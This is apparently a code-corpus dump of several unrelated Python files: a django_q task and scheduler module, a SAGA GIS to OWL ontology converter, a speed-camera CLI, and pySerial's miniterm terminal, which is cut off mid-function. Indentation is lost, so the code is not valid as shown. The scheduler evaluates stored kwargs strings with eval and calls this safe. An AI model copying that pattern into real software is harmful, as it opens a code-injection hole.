if not task.get('save', Conf.SAVE_LIMIT >= 0) and task['success']:
return
# enqueues next in a chain
if task.get('chain', None):
django_q.tasks.async_chain(task['chain'], group=task['group'], cached=task['cached'], sync=task['sync'], broker=broker)
# SAVE LIMIT > 0: Prune database, SAVE_LIMIT 0: No pruning
db.close_old_connections()
try:
if task['success'] and 0 < Conf.SAVE_LIMIT <= Success.objects.count():
Success.objects.last().delete()
# check if this task has previous results
if Task.objects.filter(id=task['id'], name=task['name']).exists():
existing_task = Task.objects.get(id=task['id'], name=task['name'])
# only update the result if it hasn't succeeded yet
if not existing_task.success:
existing_task.stopped = task['stopped']
existing_task.result = task['result']
existing_task.success = task['success']
existing_task.save()
else:
Task.objects.create(id=task['id'],
name=task['name'],
func=task['func'],
hook=task.get('hook'),
args=task['args'],
kwargs=task['kwargs'],
started=task['started'],
stopped=task['stopped'],
result=task['result'],
group=task.get('group'),
success=task['success']
)
except Exception as e:
logger.error(e)
def save_cached(task, broker):
task_key = '{}:{}'.format(broker.list_key, task['id'])
timeout = task['cached']
if timeout is True:
timeout = None
try:
group = task.get('group', None)
iter_count = task.get('iter_count', 0)
# if it's a group append to the group list
if group:
group_key = '{}:{}:keys'.format(broker.list_key, group)
group_list = broker.cache.get(group_key) or []
# if it's an iter group, check if we are ready
if iter_count and len(group_list) == iter_count - 1:
group_args = '{}:{}:args'.format(broker.list_key, group)
# collate the results into a Task result
results = [SignedPackage.loads(broker.cache.get(k))['result'] for k in group_list]
results.append(task['result'])
task['result'] = results
task['id'] = group
task['args'] = SignedPackage.loads(broker.cache.get(group_args))
task.pop('iter_count', None)
task.pop('group', None)
if task.get('iter_cached', None):
task['cached'] = task.pop('iter_cached', None)
save_cached(task, broker=broker)
else:
save_task(task, broker)
broker.cache.delete_many(group_list)
broker.cache.delete_many([group_key, group_args])
return
# save the group list
group_list.append(task_key)
broker.cache.set(group_key, group_list, timeout)
# async_task next in a chain
if task.get('chain', None):
django_q.tasks.async_chain(task['chain'], group=group, cached=task['cached'], sync=task['sync'], broker=broker)
# save the task
broker.cache.set(task_key,
SignedPackage.dumps(task),
timeout)
except Exception as e:
logger.error(e)
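# Cached results above are stored per task under "<list_key>:<task id>" and,
# for groups, their keys are collected under "<list_key>:<group>:keys". Once an
# iteration group has gathered iter_count results, they are collated into a
# single task whose id is the group name and the per-result cache entries are
# deleted.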
def scheduler(broker=None):
"""
Creates a task from a schedule at the scheduled time and schedules next run
"""
if not broker:
broker = get_broker()
db.close_old_connections()
try:
with db.transaction.atomic():
for s in Schedule.objects.select_for_update().exclude(repeats=0).filter(next_run__lt=timezone.now()):
args = ()
kwargs = {}
# get args, kwargs and hook
if s.kwargs:
try:
# eval should be safe here because dict()
kwargs = eval('dict({})'.format(s.kwargs))
except SyntaxError:
kwargs = {}
if s.args:
args = ast.literal_eval(s.args)
# single value won't eval to tuple, so:
if type(args) != tuple:
args = (args,)
q_options = kwargs.get('q_options', {})
if s.hook:
q_options['hook'] = s.hook
# set up the next run time
if not s.schedule_type == s.ONCE:
next_run = arrow.get(s.next_run)
while True:
if s.schedule_type == s.MINUTES:
next_run = next_run.replace(minutes=+(s.minutes or 1))
elif s.schedule_type == s.HOURLY:
next_run = next_run.replace(hours=+1)
elif s.schedule_type == s.DAILY:
next_run = next_run.replace(days=+1)
elif s.schedule_type == s.WEEKLY:
next_run = next_run.replace(weeks=+1)
elif s.schedule_type == s.MONTHLY:
next_run = next_run.replace(months=+1)
elif s.schedule_type == s.QUARTERLY:
next_run = next_run.replace(months=+3)
elif s.schedule_type == s.YEARLY:
next_run = next_run.replace(years=+1)
if Conf.CATCH_UP or next_run > arrow.utcnow():
break
s.next_run = next_run.datetime
s.repeats += -1
# send it to the cluster
q_options['broker'] = broker
q_options['group'] = q_options.get('group', s.name or s.id)
kwargs['q_options'] = q_options
s.task = django_q.tasks.async_task(s.func, *args, **kwargs)
# log it
if not s.task:
logger.error(
_('{} failed to create a task from schedule [{}]').format(current_process().name,
s.name or s.id))
else:
logger.info(
_('{} created a task from schedule [{}]').format(current_process().name, s.name or s.id))
# default behavior is to delete a ONCE schedule
if s.schedule_type == s.ONCE:
if s.repeats < 0:
s.delete()
continue
# but not if it has a positive repeats
s.repeats = 0
# save the schedule
s.save()
except Exception as e:
logger.error(e)
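# Illustrative only -- a schedule row that the loop above would pick up could
# be created roughly like this (field names taken from the model usage above;
# helper APIs may differ between django_q versions):
#
#   Schedule.objects.create(func='math.hypot', args='(3, 4)',
#                           schedule_type=Schedule.MINUTES, minutes=5,
#                           repeats=-1, next_run=timezone.now())
#
# kwargs is evaluated as dict(...) and args via ast.literal_eval, which is why
# both are stored as strings on the model.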
def set_cpu_affinity(n, process_ids, actual=not Conf.TESTING):
"""
Sets the cpu affinity for the supplied processes.
Requires the optional psutil module.
:param int n: affinity
:param list process_ids: a list of pids
:param bool actual: Test workaround for Travis not supporting cpu affinity
"""
# check if we have the psutil module
if not psutil:
logger.warning('Skipping cpu affinity because psutil was not found.')
return
# check if the platform supports cpu_affinity
if actual and not hasattr(psutil.Process(process_ids[0]), 'cpu_affinity'):
logger.warning('Faking cpu affinity because it is not supported on this platform')
actual = False
# get the available processors
cpu_list = list(range(psutil.cpu_count()))
    # an affinity of 0, or one that is >= cpu_count, means no affinity
if not n or n >= len(cpu_list):
return
# spread the workers over the available processors.
index = 0
for pid in process_ids:
affinity = []
for k in range(n):
if index == len(cpu_list):
index = 0
affinity.append(cpu_list[index])
index += 1
if psutil.pid_exists(pid):
p = psutil.Process(pid)
if actual:
p.cpu_affinity(affinity)
logger.info(_('{} will use cpu {}').format(pid, affinity))
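# Example (illustrative): pin each worker to a single cpu, spreading the pool
# over the available cores:
#
#   set_cpu_affinity(1, [w.pid for w in pool])
#
# With n=1 and four cpus, successive pids get affinity [0], [1], [2], [3] and
# then wrap around; n=0 or n >= cpu_count() leaves affinity untouched.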
|
saga2owl.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# author: houzhiwei
# time: 2019/1/3 16:04
from owlready2 import *
import json
import re
import os
import threading
from JSON2OWL.OwlConvert.OwlUtils import OWLUtils
from JSON2OWL.OwlConvert.Preprocessor import Preprocessor
from rdflib import BNode, RDF, Graph, URIRef, Namespace, Literal
from rdflib.collection import Collection
module_uri = 'http://www.egc.org/ont/process/saga'
onto = get_ontology(module_uri)
# onto, skos, dcterms, props = OWLUtils.load_common(onto)
onto, sh, skos, dcterms, props, foaf = OWLUtils.load_common(onto)
onto, geospatial = OWLUtils.load_geo_vocabl(onto)
onto, gb, task, data, cyber, context = OWLUtils.load_common_for_process_tool(onto)
# rdf namespaces
Data, Cyber, Skos, Sh, Geo, Sf, Process = OWLUtils.rdfnamespaces()
print('ontologies imported')
# sh:declare
# TODO TEST
# OWLUtils.declear_prefix('ns_saga', onto)
with onto:
# print(gb.GeoprocessingFunctionality)
class SagaTool(gb.GeoprocessingFunctionality):
pass
class SagaInput(cyber.Input):
pass
class SagaOutput(cyber.Output):
pass
class SagaOption(cyber.Option):
pass
# class SagaConstraint(gb.Constraint):
# pass
class SagaAvailableChoice(cyber.AvailableChoice):
pass
onto.metadata.creator.append('houzhiwei')
onto.metadata.title.append('SAGA GIS')
onto.metadata.versionInfo.append('7.3.0')
import datetime
onto.metadata.created.append(datetime.datetime.today())
g = default_world.as_rdflib_graph()
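# The owlready2 world is exposed as an rdflib graph so that SHACL shape triples
# (sh:NodeShape, sh:property, sh:in, ...) can be added alongside the classes
# and individuals created through owlready2; both views share the same backing
# store and are written out together by g.serialize() at the end of the script.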
def get_property(option, prop_type):
"""
根据配置查找对应的属性,没有则创建新的属性
Args:
option: property name
prop_type: ObjectProperty or DataProperty
Returns: created property name
"""
config = OWLUtils.get_config(module_path + '/config.ini')
_prop = OWLUtils.get_option(config, 'saga', option)
if _prop is None:
if onto.__getattr__(option) is None:
OWLUtils.create_onto_class(onto, option, prop_type)
return option
else:
return _prop
def get_format(option):
"""
get mapping format
对应的数据格式
"""
config = OWLUtils.get_config(module_path + '/config.ini')
_prop = OWLUtils.get_option(config, 'format', option)
return _prop
def handle_inout(tool, item_value, in_or_out):
"""
handle input & output
Args:
tool:
item_value:
in_or_out:
Returns:
"""
for ioD in item_value:
# print(ioD)
io_name = ioD['name']
if io_name is None:
io_name = in_or_out
_name = Preprocessor.io_name(io_name, onto)
param_rdf = None
if in_or_out == 'input':
param = SagaInput(_name, prefLabel=locstr(io_name, lang='en'))
# param = SagaInput(0,prefLabel=locstr(io_name, lang='en')) # blank node prefix with _:
tool.input.append(param)
param.isInput = True
# rdflib
param_rdf = URIRef(param.iri)
with onto:
g.add((param_rdf, RDF.type, Sh.NodeShape))
g.add((param_rdf, RDF.type, URIRef(SagaInput.iri)))
else:
param = SagaOutput(_name, prefLabel=locstr(io_name, lang='en'))
# param =SagaOutput(0, prefLabel=locstr(io_name, lang='en'))
tool.output.append(param)
param.isOutput = True
# rdflib
param_rdf = URIRef(param.iri)
with onto:
g.add((param_rdf, RDF.type, Sh.NodeShape))
g.add((param_rdf, RDF.type, URIRef(SagaOutput.iri)))
if ioD['dataType']:
vr = re.match("[a-zA-Z ]+ (?=\([a-zA-Z ]+\))?", ioD['dataType'])
dformat = vr.group().strip()
if not get_format(dformat):
continue
param.supportsDataFormat.append(data[get_format(dformat)])
# rdflib
            formatshape = BNode()
with onto:
g.add((formatshape, RDF.type, Sh.PropertyShape))
g.add((formatshape, Sh.path, Cyber.supportsDataFormat))
g.add((param_rdf, Sh.property, formatshape))
            formats = BNode()
            with onto:
                # build the RDF list node that sh:in expects, holding the supported format
                Collection(g, formats, [URIRef(data[get_format(dformat)].iri)])
                g.add((formatshape, Sh['in'], formats))
param.identifier = ioD['name']
param.description.append(ioD['description'])
param.flag = ioD['flag']
param.isOptional = ioD['isOptional']
OWLUtils.link_to_domain_concept(param, io_name.replace('_', ' '))
# shacl
pshape = Sh.PropertyShape(0)
pshape.path = onto.dataContent
if not ioD['isOptional']:
pshape.minCount = 1
pshape.message.append(ioD['name'] + " is required!")
def handle_options(tool, option, _onto):
name = option['name']
if name is None:
name = 'option'
_name = Preprocessor.io_name(Preprocessor.name_underline(name), _onto)
op = SagaOption(_name, prefLabel=locstr(name, lang='en'))
tool.option.append(op)
if option['description'] != '-':
op.description = option['description']
op.flag = option['flag']
op.identifier = name
constraints = option['constraints']
# shacl
pshape = Sh.PropertyShape(0)
pshape.path.append(_onto.dataContent)
if constraints:
if 'fields_des' in constraints.keys() and constraints['fields_des']:
op.description.append(constraints['fields_des'])
else:
if 'minimum' in constraints.keys() and constraints['minimum']:
op.minimum = constraints['minimum']
pshape.minExclusive = constraints['minimum']
if 'defaultValue' in constraints.keys() and constraints['defaultValue']:
op.defaultValue = constraints['defaultValue']
pshape.defaultValue = constraints['defaultValue']
if 'maximum' in constraints.keys() and constraints['maximum']:
op.maximum = constraints['maximum']
pshape.maxInclusive = constraints['maximum']
op.datatypeInString.append(option['dataType'])
pshape.datatype = [OWLUtils.get_datatype_iris(option['dataType'])]
op.datatype.append(OWLUtils.get_datatype_iris(option['dataType']))
if 'availableChoices' in constraints.keys() and constraints['availableChoices']:
c = []
for achoice in constraints['availableChoices']:
c.append(achoice['choice'])
with _onto:
g.add((pshape, Sh['in'], c))
OWLUtils.handle_choices(op, name, constraints['availableChoices'], SagaAvailableChoice, _onto)
def handle_task(tool, tool_name, en_str, _keywords, desc):
config = OWLUtils.get_config(module_path + '/config.ini')
tasks = config.options('task')
for task_item in tasks:
# print(task_item)
if task_item in _keywords:
task_cls = config.get('task', task_item)
task_name = Preprocessor.task_name(tool_name)
if task[task_name] is None:
task_ins = task[task_cls](task_name, prefLabel=locstr(en_str.replace('Tool', '') + " task", lang='en'))
# task_ins = task[task_cls](tool_name + "_task", prefLabel=locstr(en_str.replace('Tool', '') + " task", lang='en'))
task_ins.description.append(locstr(desc, lang='en'))
task_ins.isAtomicTask = True
task_ins.identifier = task_name
else:
task_ins = task[task_name]
            if task_ins not in tool.usedByTask:
                tool.usedByTask.append(task_ins)
            if tool not in task_ins.processingTool:
                task_ins.processingTool.append(tool)
# TODO TEST
def handle_similar_tools(tool, tool_label):
"""link tools that have the same names"""
clean_tool_label = Preprocessor.remove_bracket_content(tool_label)
similars = onto.search(prefLabel=clean_tool_label + '*')
if len(similars) > 0:
for similar in similars:
if clean_tool_label == Preprocessor.remove_bracket_content(similar.prefLabel[0]):
tool.closeMatch.append(similar)
similar.closeMatch.append(tool)
def map_to_owl(json_data):
    """mapping json data to ontology properties"""
    for d in json_data:
name = Preprocessor.toolname_underline(d['name'])
# name = re.sub("[()-*,/]", " ", name).strip()
executable = Preprocessor.normalize("saga_cmd ", d['command']['exec'])
keywords = d['keywords']
toolClass = tool_class(keywords)
if onto[name]:
# if has the same name and executable
if onto[name].executable == executable:
onto[name].is_a.append(toolClass)
continue
else:
name = name + '_' + keywords[0].replace(' ', '_')
tool = toolClass(name, prefLabel=locstr(re.sub('^(Tool)[0-9: ]+', '', d['name']), lang='en'))
# tool = toolClass(Preprocessor.space_2_underline(name), prefLabel=locstr(re.sub('^(Tool)[0-9: ]+', '', d['name']), lang='en'))
tool.isToolOfSoftware.append(cyber.SAGA_GIS)
tool.identifier = name
tool.manualPageURL.append(d['manual_url'])
# task
handle_task(tool, name, d['name'], keywords, OWLUtils.join_list(d['description']))
tool.executable = executable
tool.commandLine.append(Preprocessor.normalize("Usage: ", d['command']['cmd_line']))
tool.authors.append(OWLUtils.join_keywords(d['authors']))
for reference in d['references']:
tool.references.append(reference)
# keywords
keywords.append(name.replace('_', ' '))
OWLUtils.link_to_domain_concept(tool, keywords)
        # application category
OWLUtils.application_category(tool, [d['keywords'][0]], d['keywords'][1], d['keywords'][2:])
tool.description.append(OWLUtils.join_list(d['description']))
if d['parameters']:
for item, itemValue in d['parameters'].items():
if item == 'inputs':
handle_inout(tool, itemValue, 'input')
elif item == 'outputs':
handle_inout(tool, itemValue, 'output')
elif item == 'options':
for optionItem in itemValue:
handle_options(tool, optionItem, onto)
def tool_class(keywords):
tool_cls = keywords[0].replace(' ', '') + 'Tool'
return OWLUtils.create_onto_class(onto, tool_cls, SagaTool)
if __name__ == "__main__":
module_path = os.path.dirname(__file__)
with open(module_path + '/saga.json', 'r') as f:
jdata = json.load(f) # list
# print(len(jdata))
    # otherwise a stack overflow exception is raised
size = 1024 * 1024 * 1024 * 20 # related to system
threading.stack_size(size)
    thread = threading.Thread(target=map_to_owl, args=(jdata,))
    thread.start()
    thread.join()
    g.serialize('saga.ttl', format='turtle')
# onto.save(file='saga.owl', format="rdfxml")
# update task ontology
task.save()
print('SAGA Done!')
|
speed-camera.py
|
#! /usr/bin/env python
from smartcameras.speedcamera import SpeedCamera
import threading
import time
def main():
print("########################################")
print ""
print("You have ordered a new speed camera!")
print("We need some details before activating it:")
print ""
print("########################################")
street = raw_input('Please enter the street: ')
city = raw_input('Please enter the city: ')
speedLimit = 0
while speedLimit < 30:
speedLimit = raw_input('Please enter the speed limit (>= 30): [50]' )
if speedLimit == "":
speedLimit = 50
break
else:
try:
speedLimit = int(speedLimit)
except ValueError:
speedLimit = 0
print "FAILED: Value must be an integer!"
rate = 0
while rate <= 0:
rate = raw_input('Please enter the mean num of sightings per second (>0): [5] ')
if rate == "":
rate = 5
break
else:
try:
rate = float(rate)
except ValueError:
rate = 0
print "FAILED: Value must be a float!"
print("########################################")
print ""
print("Thanks! The camera is now being activated!")
print ""
print("########################################")
print ""
camera = SpeedCamera(street, city)
thread = threading.Thread(target=camera.activate, args=(speedLimit, rate))
thread.daemon = True
thread.start()
while not camera.isActive:
time.sleep(1)
print("The camera is now active!")
print ""
usage = '''
Operate on the camera (type on the terminal one of the following commands):
help - prompt this message
print - print camera details
relocate - move the camera to a new street (and city)
restart - restart the camera with a new speed limit
exit - deactivate the camera and terminate
'''
print(usage)
while True:
todo = raw_input("----> ")
if todo == 'relocate':
newStreet = raw_input("New street: ")
newCity = raw_input("New city: [same] ") or None
camera.relocate(newStreet, newCity)
print("Camera relocated! Operating on %s at %s" % (camera.street, camera.city))
elif todo == 'restart':
newLimit = 0
while newLimit < 30:
newLimit = raw_input('Please enter the speed limit (>= 30): [50] ')
if newLimit == "":
newLimit = 50
break
else:
try:
newLimit = int(newLimit)
except ValueError:
newLimit = 0
print "FAILED: Value must be an integer!"
print "..."
camera.deactivate()
thread.join()
thread = threading.Thread(target=camera.activate, args=(newLimit, rate))
thread.daemon = True
thread.start()
print "Camera restarted!"
elif todo == 'exit':
break
elif todo == 'print':
print(camera.toJson())
elif todo == '':
continue
else:
print(usage)
camera.deactivate()
thread.join()
print "Camera deactivated."
print "Closing..."
if __name__ == "__main__":
main()
|
miniterm.py
|
#!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import struct
import time
import fnmatch
import math
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
                elif z in (unichr(0), unichr(0x0e)):    # function keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
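# Filters are selected by these keys on the command line, e.g. (illustrative):
#
#   python miniterm.py /dev/ttyUSB0 115200 --filter colorize --filter debug
#
# Passing "--filter help" prints this table and exits; change_filter() below
# also validates names entered interactively via the menu.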
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {!r}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class FileTrans(object):
MSG_TYPE_OPEN_FILE = 130
MSG_TYPE_CLOSE_FILE = 131
MSG_TYPE_FILE_DATA = 132
MSG_TYPE_EXIT = 133
def __init__(self, serial, path):
self.serial = serial
self.path = path
def listdir(self):
self.filelist = list()
path = os.path.abspath(self.path)
if os.path.isdir(path):
listdir = [os.path.join(path, x) for x in os.listdir(path)]
self.filelist = list(filter(lambda x: os.path.isfile(x), listdir))
elif os.path.isfile(path):
self.filelist.append(path)
elif path.endswith("*"):
filterfile = list(filter(lambda x: fnmatch.fnmatch(x, os.path.basename(path)),
os.listdir(os.path.dirname(path))))
self.filelist = [os.path.join(os.path.dirname(path), x) for x in filterfile]
def pkt_enc(self, block):
magic = 0x45678998
pkt = struct.pack("I", magic)
pkt = pkt + struct.pack("H", len(block))
pkt = pkt + block
return pkt
def msg_enc(self, type, data):
msg = struct.pack("B", type)
msg = msg + data
pkt = self.pkt_enc(msg)
self.serial.write(pkt)
unused = self.serial.read(2)
unused = struct.unpack("H", unused)[0]
if unused < 8:
time.sleep(math.pow(2, 8 - unused) * 0.1)
def loop(self):
self.listdir()
for file in self.filelist:
sys.stderr.write('--- Sending file {} ---\n'.format(file))
self.msg_enc(self.MSG_TYPE_OPEN_FILE, os.path.basename(file.encode()))
with open(file, "rb") as fd:
while True:
block = fd.read(128)
sys.stderr.write('.')
if len(block) > 0:
self.msg_enc(self.MSG_TYPE_FILE_DATA, block)
else:
break
self.msg_enc(self.MSG_TYPE_CLOSE_FILE, bytes(0))
sys.stderr.write('\n--- File {} sent ---\n'.format(file))
self.msg_enc(self.MSG_TYPE_EXIT, bytes(0))
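# Wire format used by FileTrans above: each packet is
#   <uint32 magic 0x45678998> <uint16 payload length> <payload>
# (native byte order, per struct's default), where the payload is a one-byte
# message type followed by the message data (a file name, a 128-byte file
# block, or empty for CLOSE/EXIT). After every packet the sender reads a
# uint16 from the receiver that appears to act as a flow-control credit:
# values below 8 trigger an exponential back-off before the next packet.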
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
data = self.serial.read(self.serial.in_waiting or 1)
if data:
if self.raw:
self.console.write_bytes(data)
else:
text = self.rx_decoder.decode(data)
for transformation in self.rx_transformations:
text = transformation.rx(text)
self.console.write(text)
except serial.SerialException:
self.alive = False
self.console.cancel()
raise # XXX handle instead of re-raise?
def writer(self):
"""\
Loop and copy console->serial until self.exit_character character is
found. When self.menu_character is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if not self.alive:
break
if menu_active:
self.handle_menu_key(c)
menu_active = False
